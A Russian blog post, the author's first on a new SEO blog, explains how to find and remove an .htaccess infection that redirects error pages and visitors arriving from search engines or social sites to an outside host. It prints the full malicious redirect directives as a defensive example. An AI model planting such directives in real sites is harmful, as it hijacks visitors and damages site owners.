Приветствую Вас на страницах своего блога. Скорее всего, сюда вы попали с моего прошлого блога 4partners. Переезд на новый блог состоялся по одной простой причине — старое название мне разонравилось :-), к тому же оно не описывало идею блога.
Этот блог надеюсь вести регулярно, описывая больше практическую сторону заработка в интернете, добавляя переводы интересных англоязычных статей и обзоры свежих новостей SEO.
Долго думал, о чем бы написать первый пост (окромя приветственных речей), но тут подвернулась одна проблема, с которой столкнулся буквально позавчера.
Симптомы: При вводе несуществующего адреса на вашем проекте (напр. http://www.VASH-BLOG.ru/abracadabra) — происходит редирект на http://peace-security.ru/mod/index.php
Решение проблемы: Столкнувшись с данным вопросом решение обнаружил не сразу. Выяснилось, что в коде файла .htaccess прописывается следующая гадость:
ErrorDocument 400 http://peace-security.ru/mod/index.php ErrorDocument 401 http://peace-security.ru/mod/index.php ErrorDocument 403 http://peace-security.ru/mod/index.php ErrorDocument 404 http://peace-security.ru/mod/index.php ErrorDocument 500 http://peace-security.ru/mod/index.php RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ http://peace-security.ru/mod/index.php [R=301,L] |
Есть один маленький нюанс — данные директивы прописываются в файл .htaccess с большими оступлениями от начала строки… поэтому просто сделайте поиск по файлу — и смело удаляйте и директивы и пустые строки.
Одним из способов обнаружить заражение является появление большого количества .htaccess файлов во всех каталогах вашего сайта.